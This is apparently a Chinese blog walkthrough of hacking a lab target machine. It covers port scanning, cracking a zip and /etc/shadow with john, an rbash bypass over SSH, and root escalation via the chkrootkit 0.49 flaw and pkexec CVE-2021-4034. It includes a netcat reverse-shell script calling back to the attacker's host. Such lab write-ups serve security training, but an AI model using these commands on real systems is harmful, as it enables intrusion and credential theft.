靶机ip:172.16.33.40
突破
端口扫描
sudo nmap -p- 172.16.33.40 --open
结果如下:
特定端口扫描
sudo nmap -p22,80 172.16.33.40 -sV -A
结果如下:
针对80端口
从针对80端口的扫描结果可以看到save.zip这个文件,于是先访问http://172.16.33.40查看情况:
将该文件下载下来,进行解压,发现要密码:
unzip save.zip
尝试用john工具进行解密:
zip2john save.zip > save.hash
john save.hash --show
得到密码:manuel
解压后发现是一个系统文件,查看里面的shadow文件
unzip save.zip
manuel
cat /etc/shadow
结果如下:
通过shadow和passwd文件对shadow文件进行解密:
unshadow passwd shadow > pass.txt
john pass.txt --show
结果如下:
得到密码:server
针对22端口
根据shadow中的信息可以看到需要rbash绕过,则尝试ssh登录时加上绕过后缀
ssh 296640a3b825115a47b68fc44501c828@172.16.33.40 -t "bash -noprofile"
server
登录成功,突破完成。
提权
通过环境变量绕过rbash
进来后发现还是会出现command not found 的情况:
尝试通过环境变量绕过,成功:
export PATH=/usr/bin:/usr/sbin:/sbin:/bin
思路一:通过冷门可运行程序提权
发现在该用户目录下有一个可执行程序honeypot.decoy:
在执行前先去/tmp目录下通过wget以及python文件传输功能将pspy64文件传过来并打开:
(传输过程略)
chmod +x pspy64
./pspy64
结果如下图:
回到用户目录下,运行honeypot可执行文件,发现8个选项,当尝试到第5个时,发现它说将有一个程序要执行:
回到pspy监控画面,发现确实有一个文件执行了,而且是以uid=0的身份(root)执行的:
在本地端用searchsploit进行漏扫,还真的有0.49这个版本的漏洞:
searchsploit chkrootkit
searchsploit -m 33899
cat 33899.txt
从33899.txt的以下提示中可以看出,在/tmp目录下放一个叫update的非root权限的可执行文件,当chkrootkit被root权限执行时,update文件也会被以root身份执行。
那么接下来就在/tmp目录下写一段反弹shell脚本即可,脚本名称就取名update
#!/bin/sh
nc.traditional 10.8.0.19 1234 -e /bin/bash
做好监听,等待执行
提权成功,打靶完成。
思路二:通过具有suid权限的pkexec提权
查看具有suid权限的文件有哪些
find / -type f -user root -perm -u=s 2>/dev/null | grep -v 'proc\|sys'
发现pkexec:
那么这个时候直接从本地上传一个CVE-2021-4034.py文件试着执行以下
提权成功,打靶完成。
扫一扫
被折叠的 条评论
为什么被折叠?
到【灌水乐园】发言
